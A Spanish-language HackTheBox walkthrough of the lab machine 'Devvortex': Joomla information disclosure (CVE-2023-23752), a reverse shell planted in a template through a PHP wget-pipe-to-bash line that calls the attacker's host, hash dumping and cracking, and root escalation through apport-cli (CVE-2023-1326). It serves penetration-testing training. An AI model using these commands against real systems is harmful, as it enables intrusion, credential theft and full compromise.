This page looks best with JavaScript enabled

HackTheBox - Devvortex

 •  ✍️ sckull
featured image

En Devvortex inicialmente realizamos la explotacion de una vulnerabilidad en Joomla que nos dio acceso como Administrador y posteriormente la posibilidad de ejecucion de una shell inversa tras modificar el template. Dentro, enumeramos la base de datos donde descubrimos credenciales para un segundo usuario. Finalmente escalamos privilegios tras ejecutar una shell en el ‘pager’ de apport.

Nombre Devvortex box_img_maker
OS

Linux

Puntos 20
Dificultad Facil
IP 10.10.11.242
Maker

7u9y
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[5.8, 5.4, 6.3, 3.7, 4.6],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         {
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

# Nmap 7.94SVN scan initiated Sat Nov 25 16:29:16 2023 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.129.222.153
Nmap scan report for 10.129.222.153
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 25 16:29:25 2023 -- 1 IP address (1 host up) scanned in 9.51 seconds

Web Site

El sitio web nos redirige al dominio devvortex.htb el cual agregamos al archivo /etc/hosts.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/devvortex ❯ curl -sI 10.129.222.153
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 25 Nov 2023 21:30:25 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://devvortex.htb/

 π ~/htb/devvortex ❯

El sitio muestra multiples enlaces, y, aparentemente es un sitio estatico.

image

Directory Brute Forcing

feroxbuster muestra los archivos y recursos del sitio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

 π ~/htb/devvortex ❯ feroxbuster -u http://devvortex.htb/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://devvortex.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       12w      178c http://devvortex.htb/images => http://devvortex.htb/images/
301      GET        7l       12w      178c http://devvortex.htb/css => http://devvortex.htb/css/
301      GET        7l       12w      178c http://devvortex.htb/js => http://devvortex.htb/js/
200      GET        3l       10w      667c http://devvortex.htb/images/telephone-white.png
200      GET       11l       50w     2892c http://devvortex.htb/images/d-1.png
200      GET       44l      290w    17183c http://devvortex.htb/images/c-1.png
200      GET        5l       55w     1797c http://devvortex.htb/images/linkedin.png
200      GET      100l      178w     1904c http://devvortex.htb/css/responsive.css
200      GET      254l      520w     7603c http://devvortex.htb/do.html
200      GET      231l      545w     7388c http://devvortex.htb/about.html
200      GET      229l      475w     6845c http://devvortex.htb/portfolio.html
200      GET        7l       30w     2018c http://devvortex.htb/images/d-3.png
200      GET        5l       12w      847c http://devvortex.htb/images/envelope-white.png
200      GET        5l       23w     1217c http://devvortex.htb/images/location-white.png
200      GET        6l       13w      639c http://devvortex.htb/images/quote.png
200      GET       11l       39w     3419c http://devvortex.htb/images/d-4.png
200      GET      714l     1381w    13685c http://devvortex.htb/css/style.css
200      GET       87l      363w    24853c http://devvortex.htb/images/c-3.png
200      GET        6l       57w     1878c http://devvortex.htb/images/youtube.png
200      GET        6l       52w     1968c http://devvortex.htb/images/twitter.png
200      GET        5l       48w     1493c http://devvortex.htb/images/fb.png
200      GET        2l     1276w    88145c http://devvortex.htb/js/jquery-3.4.1.min.js
200      GET        9l       24w     2405c http://devvortex.htb/images/d-2.png
200      GET      348l     2369w   178082c http://devvortex.htb/images/map-img.png
200      GET      536l     2364w   201645c http://devvortex.htb/images/who-img.jpg
200      GET      536l     3109w   243112c http://devvortex.htb/images/w-3.png
200      GET       71l      350w    24351c http://devvortex.htb/images/c-2.png
200      GET      289l      573w     8884c http://devvortex.htb/contact.html
200      GET      583l     1274w    18048c http://devvortex.htb/index.html
200      GET     4440l    10999w   131868c http://devvortex.htb/js/bootstrap.js
200      GET      512l     2892w   241721c http://devvortex.htb/images/w-4.png
200      GET    10038l    19587w   192348c http://devvortex.htb/css/bootstrap.css
200      GET      636l     3934w   306731c http://devvortex.htb/images/w-2.png
200      GET      675l     4019w   330600c http://devvortex.htb/images/w-1.png
200      GET      583l     1274w    18048c http://devvortex.htb/

Subdomain Discovery

Tras ejecutar ffuf este muestra el subdominio dev.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

 π ~/htb/devvortex ❯ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 95ms]
:: Progress: [100000/100000] :: Job [1/1] :: 564 req/sec :: Duration: [0:02:58] :: Errors: 0 ::
 π ~/htb/devvortex ❯

Joomla

El subdominio muestra un sitio nuevo, parece ser el sitio de una compania de desarrollo web.

image

Wappalyzer muestra multiples tecnologias utilizadas por el sitio.

image

Intentamos generar un error para verificar la existencia de alguna tecnologia en el backend. Observamos que el favico pertenece a Joomla, y, ademas Wappalyzer muestra el CMS Joomla.

image

Identificamos la version como Joomla 4.2.6.

1
2
3
4
5

 π ~/htb/devvortex ❯ curl -s http://dev.devvortex.htb/administrator/manifests/files/joomla.xml | grep version
<?xml version="1.0" encoding="UTF-8"?>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<version>4.2.6</version>
 π ~/htb/devvortex ❯

Joomla - CVE-2023-23752

Realizamos una busqueda de vulnerabilidades/exploits y observamos que existe una que afecta a esta version.

image

Segun el codigo de Joomla! v4.2.8 - Unauthenticated information disclosure este realiza dos solicitudes a dos direcciones de la API, una para los usuarios y otra para la configuracion.

1
2

http://dev.devvortex.htb/api/index.php/v1/users?public=true
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

Si observamos los usuarios, muestra dos unicos usuarios: lewis y logan. El primero como super user y el otro como registrado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

 π ~/htb/devvortex ❯ curl -s "http://dev.devvortex.htb/api/index.php/v1/users?public=true" | jq
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/users?public=true"
  },
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2024-02-10 00:03:24",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
    {
      "type": "users",
      "id": "650",
      "attributes": {
        "id": 650,
        "name": "logan paul",
        "username": "logan",
        "email": "logan@devvortex.htb",
        "block": 0,
        "sendEmail": 0,
        "registerDate": "2023-09-26 19:15:42",
        "lastvisitDate": null,
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Registered"
      }
    }
  ],
  "meta": {
    "total-pages": 1
  }
}
 π ~/htb/devvortex ❯

Luego, tenemos la configuracion, donde podemos destacar la contrasena P4ntherg0t1n5r3c0n##.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174

 π ~/htb/devvortex ❯ curl -s "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
    "next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
    "last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
  },
  "data": [
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_message": "This site is down for maintenance.<br>Please check back again soon.",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "display_offline_message": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_image": "",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "sitename": "Development",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "editor": "tinymce",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "captcha": "0",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "list_limit": 20,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "access": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang_const": true,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbtype": "mysqli",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "host": "localhost",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "db": "joomla",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbprefix": "sd4fg_",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbencryption": 0,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbsslverifyservercert": false,
        "id": 224
      }
    }
  ],
  "meta": {
    "total-pages": 4
  }
}
 π ~/htb/devvortex ❯

1
2
3
4
5

users : 
	- lewis
	- logan

pasword : P4ntherg0t1n5r3c0n##

Joomla - Access

Logramos acceder al panel de Joomla con la contrasena y el usuario lewis.

image

User - www-data

Intentamos ejecutar codigo en System -> Templates -> Site Templates -> Cassiopeia -> error.php.

image

Observamos los cambios al provocar un error.

image

Editamos nuevamente esta vez agregando la ejecucion de una shell inversa con shells.

1
2
3

<?php

system('wget -qO- 10.10.14.47:8000/10.10.14.47:1335 | bash ');

Obtuvimos acceso a la maquina como www-data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/devvortex ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.47] from devvortex.htb [10.129.222.153] 49174
/bin/sh: 0: can't access tty; job control turned off
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/dev.devvortex.htb/templates/cassiopeia
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$

User - Logan

Nuevamente en el archivo de configuracion se observa la configuracion a la que tuvimos acceso anteriormente.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

www-data@devvortex:~/dev.devvortex.htb$ cat configuration.php
<?php
class JConfig {
	public $offline = false;
	public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
	public $display_offline_message = 1;
	public $offline_image = '';
	public $sitename = 'Development';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = 20;
	public $access = 1;
	public $debug = false;
	public $debug_lang = false;
	public $debug_lang_const = true;
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'lewis';
	public $password = 'P4ntherg0t1n5r3c0n##';
	public $db = 'joomla';
	public $dbprefix = 'sd4fg_';
	public $dbencryption = 0;
	public $dbsslverifyservercert = false;
	public $dbsslkey = '';
	public $dbsslcert = '';
	public $dbsslca = '';
	public $dbsslcipher = '';
	public $force_ssl = 0;
	public $live_site = '';
	public $secret = 'ZI7zLTbaGKliS9gq';
	public $gzip = false;
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $offset = 'UTC';
	public $mailonline = true;
	public $mailer = 'mail';
	public $mailfrom = 'lewis@devvortex.htb';
	public $fromname = 'Development';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = false;
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = 25;
	public $caching = 0;
	public $cache_handler = 'file';
	public $cachetime = 15;
	public $cache_platformprefix = false;
	public $MetaDesc = '';
	public $MetaAuthor = true;
	public $MetaVersion = false;
	public $robots = '';
	public $sef = true;
	public $sef_rewrite = false;
	public $sef_suffix = false;
	public $unicodeslugs = false;
	public $feed_limit = 10;
	public $feed_email = 'none';
	public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
	public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
	public $lifetime = 15;
	public $session_handler = 'database';
	public $shared_session = false;
	public $session_metadata = true;
}www-data@devvortex:~/dev.devvortex.htb$

Observamos que el puerto 3306 de MySQL esta abierto.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

www-data@devvortex:~/dev.devvortex.htb$ netstat -ntpl
netstat -ntpl
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      872/nginx: worker p
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      872/nginx: worker p
tcp6       0      0 :::22                   :::*                    LISTEN      -
www-data@devvortex:~/dev.devvortex.htb$

Realizamos la conexion a mysql con las credenciales conocidas. Tras listar las bases de datos vemos joomla.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

www-data@devvortex:~$ mysql -D joomla -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 21805
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)

mysql>

Tras listar las tablas vemos la tabla users.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

mysql> show tables;
show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| sd4fg_action_log_config       |
| sd4fg_action_logs             |
| sd4fg_action_logs_extensions  |
| sd4fg_action_logs_users       |
| sd4fg_assets                  |
| sd4fg_associations            |
[...]      |
| sd4fg_usergroups              |
| sd4fg_users                   |
| sd4fg_viewlevels              |
| sd4fg_webauthn_credentials    |
| sd4fg_workflow_associations   |
| sd4fg_workflow_stages         |
| sd4fg_workflow_transitions    |
| sd4fg_workflows               |
+-------------------------------+
71 rows in set (0.00 sec)

mysql>

Observamos que existen dos contrasenas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

mysql> describe sd4fg_users;
describe sd4fg_users;
+---------------+---------------+------+-----+---------+----------------+
| Field         | Type          | Null | Key | Default | Extra          |
+---------------+---------------+------+-----+---------+----------------+
| id            | int           | NO   | PRI | NULL    | auto_increment |
| name          | varchar(400)  | NO   | MUL |         |                |
| username      | varchar(150)  | NO   | UNI |         |                |
| email         | varchar(100)  | NO   | MUL |         |                |
| password      | varchar(100)  | NO   |     |         |                |
| block         | tinyint       | NO   | MUL | 0       |                |
| sendEmail     | tinyint       | YES  |     | 0       |                |
| registerDate  | datetime      | NO   |     | NULL    |                |
| lastvisitDate | datetime      | YES  |     | NULL    |                |
| activation    | varchar(100)  | NO   |     |         |                |
| params        | text          | NO   |     | NULL    |                |
| lastResetTime | datetime      | YES  |     | NULL    |                |
| resetCount    | int           | NO   |     | 0       |                |
| otpKey        | varchar(1000) | NO   |     |         |                |
| otep          | varchar(1000) | NO   |     |         |                |
| requireReset  | tinyint       | NO   |     | 0       |                |
| authProvider  | varchar(100)  | NO   |     |         |                |
+---------------+---------------+------+-----+---------+----------------+
17 rows in set (0.00 sec)

mysql> select name,username,email,password from sd4fg_users;
select name,username,email,password from sd4fg_users;
+------------+----------+---------------------+--------------------------------------------------------------+
| name       | username | email               | password                                                     |
+------------+----------+---------------------+--------------------------------------------------------------+
| lewis      | lewis    | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan paul | logan    | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+------------+----------+---------------------+--------------------------------------------------------------+
2 rows in set (0.01 sec)

mysql>

Cracking the Hash

Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash. El cual encontro una contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/devvortex ❯ john hash -wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (?)
1g 0:00:00:18 DONE (2023-11-25 17:17) 0.05461g/s 76.67p/s 76.67c/s 76.67C/s kelvin..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/devvortex ❯

Shell

Observamos que logan existe en la maquina.

1
2
3
4

www-data@devvortex:~/dev.devvortex.htb$ cat /etc/passwd | grep home
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
logan:x:1000:1000:,,,:/home/logan:/bin/bash
www-data@devvortex:~/dev.devvortex.htb$

Utilizamos la contrasena con este usuario logrando el acceso y la lectura a la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

www-data@devvortex:~$ su logan
Password: tequieromucho

logan@devvortex:/var/www$ whoami;id
logan
uid=1000(logan) gid=1000(logan) groups=1000(logan)
logan@devvortex:/var/www$ cd
logan@devvortex:~$ ls
user.txt
logan@devvortex:~$ cat user.txt
e816d767fa12e430a8e94d3741c367e6
logan@devvortex:~$

Privesc

Observamos que el usuario logan puede ejecutar /usr/bin/apport-cli como root.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

logan@devvortex:~$ sudo -l -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:

Sudoers entry:
    RunAsUsers: ALL
    RunAsGroups: ALL
    Commands:
	/usr/bin/apport-cli
logan@devvortex:~$

Vemos las diferentes opciones del comando y la version.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

logan@devvortex:~$ sudo /usr/bin/apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]

Options:
  -h, --help            show this help message and exit
  -f, --file-bug        Start in bug filing mode. Requires --package and an
                        optional --pid, or just a --pid. If neither is given,
                        display a list of known symptoms. (Implied if a single
                        argument is given.)
  -w, --window          Click a window as a target for filing a problem
                        report.
  -u UPDATE_REPORT, --update-bug=UPDATE_REPORT
                        Start in bug updating mode. Can take an optional
                        --package.
  -s SYMPTOM, --symptom=SYMPTOM
                        File a bug report about a symptom. (Implied if symptom
                        name is given as only argument.)
  -p PACKAGE, --package=PACKAGE
                        Specify package name in --file-bug mode. This is
                        optional if a --pid is specified. (Implied if package
                        name is given as only argument.)
  -P PID, --pid=PID     Specify a running program in --file-bug mode. If this
                        is specified, the bug report will contain more
                        information.  (Implied if pid is given as only
                        argument.)
  --hanging             The provided pid is a hanging application.
  -c PATH, --crash-file=PATH
                        Report the crash from given .apport or .crash file
                        instead of the pending ones in /var/crash. (Implied if
                        file is given as only argument.)
  --save=PATH           In bug filing mode, save the collected information
                        into a file instead of reporting it. This file can
                        then be reported later on from a different machine.
  --tag=TAG             Add an extra tag to the report. Can be specified
                        multiple times.
  -v, --version         Print the Apport version number.
logan@devvortex:~$ sudo /usr/bin/apport-cli --version
2.20.11
logan@devvortex:~$

CVE-2023-1326

Encontramos que es posible escalar privilegios ya que apport utiliza less como pager. Para explotar la vulnerabilidad es necesario tener un archivo .crash, para ello nos reerimos a Managin Core Dumps y al “PoC”.

Provocamos la creacion del archivo .crash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

logan@devvortex:/dev/shm$ sleep 500 &
[1] 16812
logan@devvortex:/dev/shm$ kill -s SIGTRAP $(pgrep sleep)
logan@devvortex:/dev/shm$
[1]+  Trace/breakpoint trap   (core dumped) sleep 500
logan@devvortex:/dev/shm$
logan@devvortex:/dev/shm$ ls -l /var/crash
total 32
-rw-r----- 1 logan logan 32277 Nov 25 22:26 _usr_bin_sleep.1000.crash
logan@devvortex:/dev/shm$

Ejecutamos apport sobre este archivo, observamos que se muestra la opcion de less, con ello podemos utilizar alguna de las opciones GTFOBins (less), para luego obtener una shell como root y nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

logan@devvortex:/dev/shm$ sudo apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
< apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (32.0 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v
v^J

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
............................................ [...] ...........................................

[...]

.........................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
................
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# whoami;id;pwd
root
uid=0(root) gid=0(root) groups=0(root)
/dev/shm
# cd /root
# ls
root.txt
# cat root.txt
a335b119a4544f839552343303277fb2
#
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HackTheBox - Devvortex